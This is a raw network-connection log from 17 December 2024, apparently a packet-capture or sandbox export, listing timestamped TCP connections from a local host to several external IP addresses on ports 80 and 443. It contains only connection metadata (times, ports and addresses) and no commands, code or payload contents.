Dec 17, 2024 13:36:12.262088060 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.262147903 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.262454987 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.265090942 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.265170097 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.265255928 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.265364885 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.268727064 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.268907070 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.269038916 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.269306898 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.272770882 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.272865057 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.272871971 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.272954941 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.276232004 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.276293039 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.276540041 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.276693106 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.280129910 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.280196905 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.280308008 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.280539989 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.283700943 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.283817053 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.283824921 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.283898115 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.287283897 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.287358046 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.287456036 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.287524939 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.291028023 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.291090965 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.291115046 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.291198015 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.294222116 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.294275045 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.294343948 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.294429064 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.297403097 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.297470093 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.297525883 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.297693014 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.300585032 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.300647974 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.300856113 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.300940990 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.303709984 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.303895950 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.303905010 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.303955078 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.307197094 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.307331085 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.307337046 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.307399988 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.309933901 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.309993982 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.310092926 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.310185909 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.312848091 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.313915014 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.313921928 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.314029932 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.316481113 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.316611052 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.316618919 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.319153070 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.319247007 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.319255114 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.319338083 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.319645882 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.319818974 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.322104931 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.322235107 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.322549105 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.322683096 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.325664043 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.327181101 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.327194929 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.327332973 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.330861092 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.331425905 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.331696033 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.331703901 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.331823111 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.332221031 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.332345963 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.340943098 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.341569901 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.341639042 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.341660023 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.341667891 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.341711998 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.341711998 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.341770887 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.341844082 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.342236042 CET	443	49823	142.250.181.97	192.168.2.5
Dec 17, 2024 13:36:12.342288971 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.342288971 CET	49823	443	192.168.2.5	142.250.181.97
Dec 17, 2024 13:36:12.735559940 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:12.855839968 CET	80	49839	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:12.856117964 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:12.856370926 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:12.976993084 CET	80	49839	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:14.208739996 CET	80	49839	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:14.213044882 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:14.332926989 CET	80	49839	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:14.672534943 CET	80	49839	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:14.717819929 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:15.078737974 CET	49845	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:15.078775883 CET	443	49845	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:15.078839064 CET	49845	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:15.080480099 CET	49845	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:15.080507994 CET	443	49845	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:16.306036949 CET	443	49845	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:16.306200981 CET	49845	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:16.310167074 CET	49845	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:16.310179949 CET	443	49845	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:16.310642004 CET	443	49845	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:16.315150976 CET	49845	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:16.355331898 CET	443	49845	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:16.742789984 CET	443	49845	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:16.742948055 CET	443	49845	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:16.743032932 CET	49845	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:16.748755932 CET	49845	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:16.755568981 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:16.875437975 CET	80	49839	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:17.179202080 CET	80	49839	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:17.181382895 CET	49851	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:17.181413889 CET	443	49851	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:17.181477070 CET	49851	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:17.181746960 CET	49851	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:17.181766987 CET	443	49851	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:17.233428955 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:18.399903059 CET	443	49851	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:18.401803970 CET	49851	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:18.401869059 CET	443	49851	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:18.850320101 CET	443	49851	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:18.850476980 CET	443	49851	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:18.850541115 CET	49851	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:18.850867033 CET	49851	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:18.854806900 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:18.855917931 CET	49857	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:18.975529909 CET	80	49839	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:18.975717068 CET	49839	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:18.976730108 CET	80	49857	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:18.976826906 CET	49857	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:18.976991892 CET	49857	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:19.099124908 CET	80	49857	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:20.282059908 CET	80	49857	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:20.283339977 CET	49858	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:20.283401012 CET	443	49858	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:20.283479929 CET	49858	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:20.283704996 CET	49858	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:20.283721924 CET	443	49858	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:20.327176094 CET	49857	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:21.501770020 CET	443	49858	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:21.503705025 CET	49858	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:21.503750086 CET	443	49858	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:21.950036049 CET	443	49858	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:21.950211048 CET	443	49858	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:21.950295925 CET	49858	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:21.950618029 CET	49858	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:21.954000950 CET	49857	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:21.955133915 CET	49864	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:22.074445963 CET	80	49857	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:22.074573994 CET	49857	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:22.074865103 CET	80	49864	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:22.074958086 CET	49864	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:22.075090885 CET	49864	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:22.195015907 CET	80	49864	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:23.379806995 CET	80	49864	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:23.381140947 CET	49870	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:23.381182909 CET	443	49870	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:23.381247044 CET	49870	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:23.381469965 CET	49870	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:23.381479979 CET	443	49870	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:23.421020031 CET	49864	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:24.595837116 CET	443	49870	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:24.597496986 CET	49870	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:24.597512007 CET	443	49870	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:25.041935921 CET	443	49870	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:25.042010069 CET	443	49870	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:25.042062044 CET	49870	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:25.042383909 CET	49870	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:25.046948910 CET	49876	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:25.267369032 CET	80	49876	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:25.267528057 CET	49876	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:25.267719984 CET	49876	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:25.507879019 CET	80	49876	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:26.608865023 CET	80	49876	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:26.610249996 CET	49877	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:26.610296965 CET	443	49877	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:26.610404015 CET	49877	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:26.610694885 CET	49877	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:26.610711098 CET	443	49877	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:26.655383110 CET	49876	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:27.823370934 CET	443	49877	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:27.825719118 CET	49877	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:27.825738907 CET	443	49877	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:28.281646967 CET	443	49877	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:28.281733036 CET	443	49877	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:28.281917095 CET	49877	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:28.282268047 CET	49877	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:28.285468102 CET	49876	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:28.286391973 CET	49883	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:28.405865908 CET	80	49876	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:28.406138897 CET	80	49883	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:28.406193018 CET	49876	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:28.406212091 CET	49883	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:28.406336069 CET	49883	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:28.526163101 CET	80	49883	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:29.773024082 CET	80	49883	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:29.774539948 CET	49889	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:29.774576902 CET	443	49889	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:29.774647951 CET	49889	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:29.774992943 CET	49889	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:29.775007963 CET	443	49889	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:29.827174902 CET	49883	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:30.992643118 CET	443	49889	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:30.994210958 CET	49889	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:30.994236946 CET	443	49889	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:31.439635038 CET	443	49889	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:31.439718008 CET	443	49889	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:31.439770937 CET	49889	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:31.440254927 CET	49889	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:31.448942900 CET	49883	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:31.449570894 CET	49892	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:31.569339037 CET	80	49883	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:31.569359064 CET	80	49892	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:31.569431067 CET	49883	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:31.569456100 CET	49892	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:31.569571018 CET	49892	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:31.689322948 CET	80	49892	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:32.878972054 CET	80	49892	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:32.880419016 CET	49896	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:32.880476952 CET	443	49896	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:32.880589008 CET	49896	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:32.880815029 CET	49896	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:32.880835056 CET	443	49896	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:32.921010017 CET	49892	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:34.098795891 CET	443	49896	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:34.100431919 CET	49896	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:34.100466013 CET	443	49896	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:34.546099901 CET	443	49896	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:34.546241045 CET	443	49896	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:34.546315908 CET	49896	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:34.546890974 CET	49896	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:34.550792933 CET	49892	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:34.551934958 CET	49902	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:34.670994997 CET	80	49892	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:34.671072006 CET	49892	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:34.671785116 CET	80	49902	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:34.671868086 CET	49902	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:34.671988010 CET	49902	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:34.791894913 CET	80	49902	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:35.979310036 CET	80	49902	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:35.980627060 CET	49903	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:35.980681896 CET	443	49903	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:35.980757952 CET	49903	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:35.980987072 CET	49903	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:35.981004000 CET	443	49903	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:36.030314922 CET	49902	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:37.201175928 CET	443	49903	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:37.202796936 CET	49903	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:37.202822924 CET	443	49903	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:37.650563955 CET	443	49903	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:37.650729895 CET	443	49903	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:37.650815964 CET	49903	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:37.651146889 CET	49903	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:37.653721094 CET	49902	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:37.654656887 CET	49909	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:37.773933887 CET	80	49902	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:37.774024963 CET	49902	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:37.774585009 CET	80	49909	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:37.774674892 CET	49909	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:37.774811029 CET	49909	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:37.894906998 CET	80	49909	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:39.078545094 CET	80	49909	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:39.079864025 CET	49915	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:39.079891920 CET	443	49915	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:39.079956055 CET	49915	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:39.080270052 CET	49915	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:39.080281973 CET	443	49915	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:39.124062061 CET	49909	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:40.297972918 CET	443	49915	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:40.299540997 CET	49915	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:40.299577951 CET	443	49915	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:40.760879993 CET	443	49915	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:40.760946989 CET	443	49915	172.67.177.134	192.168.2.5
Dec 17, 2024 13:36:40.761008024 CET	49915	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:40.761430979 CET	49915	443	192.168.2.5	172.67.177.134
Dec 17, 2024 13:36:40.785906076 CET	49909	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:40.906173944 CET	80	49909	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:40.906259060 CET	49909	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:40.925944090 CET	49921	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:40.925981045 CET	443	49921	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:40.926054001 CET	49921	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:40.926439047 CET	49921	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:40.926456928 CET	443	49921	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:41.458565950 CET	80	49909	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:41.458646059 CET	49909	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:41.579260111 CET	80	49909	132.226.247.73	192.168.2.5
Dec 17, 2024 13:36:42.724186897 CET	443	49921	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:42.724304914 CET	49921	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:42.725774050 CET	49921	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:42.725780010 CET	443	49921	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:42.726185083 CET	443	49921	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:42.727463007 CET	49921	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:42.771334887 CET	443	49921	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:43.220762014 CET	443	49921	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:43.220948935 CET	443	49921	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:43.221045971 CET	49921	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:43.223030090 CET	49921	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:48.954683065 CET	49864	80	192.168.2.5	132.226.247.73
Dec 17, 2024 13:36:49.166174889 CET	49941	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:49.166223049 CET	443	49941	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:49.166297913 CET	49941	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:49.166599989 CET	49941	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:49.166619062 CET	443	49941	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:50.530153036 CET	443	49941	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:50.532339096 CET	49941	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:50.532370090 CET	443	49941	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:50.532444000 CET	49941	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:50.532455921 CET	443	49941	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:51.113370895 CET	443	49941	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:51.113609076 CET	443	49941	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:51.113679886 CET	49941	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:51.114020109 CET	49941	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:52.662256956 CET	49948	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:52.662293911 CET	443	49948	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:52.662374020 CET	49948	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:52.662626028 CET	49948	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:52.662636995 CET	443	49948	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:54.029701948 CET	443	49948	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:54.031265974 CET	49948	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:54.031276941 CET	443	49948	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:54.031335115 CET	49948	443	192.168.2.5	149.154.167.220
Dec 17, 2024 13:36:54.031341076 CET	443	49948	149.154.167.220	192.168.2.5
Dec 17, 2024 13:36:54.726811886 CET	443	49948	149.154.167.220	192.168.2.5
